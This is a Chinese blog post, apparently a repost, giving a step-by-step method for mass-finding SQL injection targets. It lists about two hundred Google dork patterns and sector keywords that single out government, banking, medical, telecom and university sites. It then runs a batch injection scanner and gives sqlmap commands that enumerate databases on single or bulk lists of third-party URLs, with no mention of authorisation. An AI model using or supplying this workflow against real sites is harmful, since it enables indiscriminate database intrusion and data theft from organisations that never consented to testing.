vlambda博客
学习文章列表

干货 | 批量挖sql注入漏洞

关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候,曾经在往常查阅了以下关于批量挖SQL注入的文章,其实没几个,无非就是告诉你用谷歌关键词之类的,但是搜索出来的站点挨个测试,太费时间和精力,效率太低


这里我就讲一下怎么用最省力的方式批量刷sql注入的站点

第一这里需要几个工具

①7KBscan 爬虫机器人 (爬虫工具,种类很多,也可以自己写)

②批量检测sql注入的工具(我这里用的是御剑的一个修改版,其实网上很多)

③sqlmap

第一步,当然是收集可能存在sql注入的url

这里用到我们的7KBscan,一般存在sql注入的站点,都是带数据交换的地方

这里我们搜索的关键词就要异想天开了

inurl:这个是指定url进行搜索,可以参考以下

NewsInfo.asp?id=


otherinfo.asp?id=


info.asp?id=


news_show.asp?id=


showhf.asp?id=


detailshow.asp?ID=


(site:网站域名 inurl:Article_Print.asp?)指定网站


CompHonorBig.asp?id=


EnCompHonorBig.asp?id=


Google dorks sql injection:


NewsInfo.asp?id=


Show.asp?Id=


intitle:山西学校 inurl:asp?=


inurl: (asp?=数字) inurl: (php?=数字)


inurl:Article_Print.asp?


inurl:ManageLogin.asp


inurl:Offer.php?idf=


inurl:Opinions.php?id=


inurl:Page.php?id=


inurl:Pop.php?id=


inurl:Post.php?id=


inurl:Prod_info.php?id=


inurl:Product-item.php?id=


inurl:Product.php?id=


inurl:Product_ranges_view.php?ID=


inurl:Productdetail.php?id=


inurl:Productinfo.php?id=


inurl:Produit.php?id=


inurl:Profile_view.php?id=


inurl:Publications.php?id=


inurl:Stray-Questions-View.php?num=


inurl:aboutbook.php?id=


inurl:ages.php?id=


inurl:announce.php?id=


inurl:art.php?idm=


inurl:article.php?ID=


inurl:articleshow.asp?articleid=任意数字


inurl:artikelinfo.php?id=


inurl:asp


inurl:asp?id=


inurl:avd_start.php?avd=


inurl:band_info.php?id=


inurl:buy.php?category=


inurl:category.php?id=


inurl:channel_id=


inurl:chappies.php?id=


inurl:clanek.php4?id=


inurl:clubpage.php?id=


inurl:collectionitem.php?id=


inurl:communique_detail.php?id=


inurl:curriculum.php?id=


inurl:declaration_more.php?decl_id=


inurl:detail.php?ID=


inurl:download.php?id=


inurl:downloads_info.php?id=


inurl:event.php?id=


inurl:faq2.php?id=


inurl:fellows.php?id=


inurl:fiche_spectacle.php?id=


inurl:forum_bds.php?num=


inurl:galeri_info.php?l=


inurl:gallery.php?id=


inurl:game.php?id=


inurl:games.php?id=


inurl:historialeer.php?num=


inurl:hosting_info.php?id=


inurl:humor.php?id=


inurl:index.php?=


inurl:index.php?id=


inurl:index2.php?option=


inurl:iniziativa.php?in=


inurl:item_id=


inurl:kategorie.php4?id=


inurl:labels.php?id=


inurl:loadpsb.php?id=


inurl:look.php?ID=


inurl:main.php?id=


inurl:material.php?id=


inurl:memberInfo.php?id=


inurl:news-full.php?id=


inurl:news.php?id=


inurl:newsDetail.php?id=


inurl:news_Article.asp?Class_ID=


inurl:news_display.php?getid=


inurl:news_view.php?id=


inurl:newscat.php?id=


inurl:newsid=


inurl:newsitem.php?num=


inurl:newsone.php?id=


inurl:newsticker_info.php?idn=


inurl:ray.php?id=


inurl:read.php?id=


inurl:readnews.php?id=


inurl:reagir.php?num=


inurl:releases.php?id=


inurl:review.php?id=


inurl:rub.php?idr=


inurl:rubp.php?idr=


inurl:rubrika.php?idr=


inurl:section.php?id=


inurl:select_biblio.php?id=


inurl:sem.php3?id=


inurl:shop.php?do=part&id=


inurl:shop_category.php?id=


inurl:shopping.php?id=


inurl:show.php?id=


inurl:show_an.php?id=


inurl:showimg.php?id=


inurl:shredder-categories.php?id=


inurl:spr.php?id=


inurl:staff_id=


inurl:story.php?id=


inurl:sw_comment.php?id=


inurl:tekst.php?idt=


inurl:theme.php?id=


inurl:title.php?id=


inurl:top10.php?cat=


inurl:tradeCategory.php?id=


inurl:trainers.php?id=


inurl:transcript.php?id=


inurl:view.php?id=


inurl:view_faq.php?id=


inurl:view_product.php?id=


inurl:viewapp.php?id=


inurl:viewphoto.php?id=


inurl:viewshowdetail.php?id=


inurl:website.php?id=


inurl:age.php?file=


inurl:ageid=


showproduct.asp?id=


showproduct.asp?id=随便加个数字

当然还有很多,这里只是列举了一些常见的cms的命名


下一步就是标题了

intitle:(这里面就要你脑洞大开了)

xxx政府,xxx市委,xxx局,开玩笑的,这里的话其实随便填了,钢筋大炮混凝土,想到啥就写啥

"医药inurl:php id"

"保险inurl:php id"

"银行inurl:php id

"金融inurl:php id"

"酒店inurl:php id"

"运营商inurl:php id"

"航天航空inurl:php id"

"社交inurl:php id"

"电商inurl:php id"

"旅游inurl:php id"

"政府inurl:php id"

"媒体inurl:php id"

"医药inurl:php id"

"保险inurl:php id"

"高校inurl:php id"

"海外inurl:php id"

"互联网inurl:php id"

"医药inurl:asp id"

"保险inurl:asp id"

"银行inurl:asp id

"金融inurl:asp id"

"酒店inurl:asp id"

"运营商inurl:asp id"

"航天航空inurl:asp id"

"社交inurl:asp id"

"电商inurl:asp id"

"旅游inurl:asp id"

"政府inurl:asp id"

"媒体inurl:asp id"

"医药inurl:asp id"

"保险inurl:asp id"

"高校inurl:asp id"

"海外inurl:asp id"

"互联网inurl:asp id"

"医药inurl:jsp id"

"保险inurl:jsp id"

"银行inurl:jsp id

"金融inurl:jsp id"

"酒店inurl:jsp id"

"运营商inurl:jsp id"

"航天航空inurl:jsp id"

"社交inurl:jsp id"

"电商inurl:jsp id"

"旅游inurl:jsp id"

"政府inurl:jsp id"

"媒体inurl:jsp id"

"医药inurl:jsp id"

"保险inurl:jsp id"

"高校inurl:jsp id"

"海外inurl:jsp id"

"互联网inurl:jsp id"


然后就可以批量url了


我们爬取的url导出到txt文件


下一步就用到我们的第二个工具 sql注入检测(这里的检测不是绝对的,是可能存在注入的)

原理很简单,这里就不说了


打开我们的御剑修改版的sql注入检测模块

导入txt文件,然后开始检测

这个御剑批量检测选出来的网站就很可能存在sql注入了,下一步就是通过sqlmap进行检测了

方法有很多种,建议是先打开链接看一下,是不是符合你的要求,你感觉符合你的要求再放到sqlmap里面跑数据


如果感觉一个一个的麻烦,也可以把符合你要求的站点放到一个txt文件里面 批量检测,但是可能会很卡


sqlmap.py -u www.xxx.com/public/1.php?id=1 -dbs --batch(单个url)

sqlmap.py -m c:/windows/1.txt -dbs --batch(批量)



转载于https://blog.csdn.net/weixin_44578334/article/details/108967411?spm=1001.2014.3001.5501

师傅们点赞、转发、在看就是最大的支持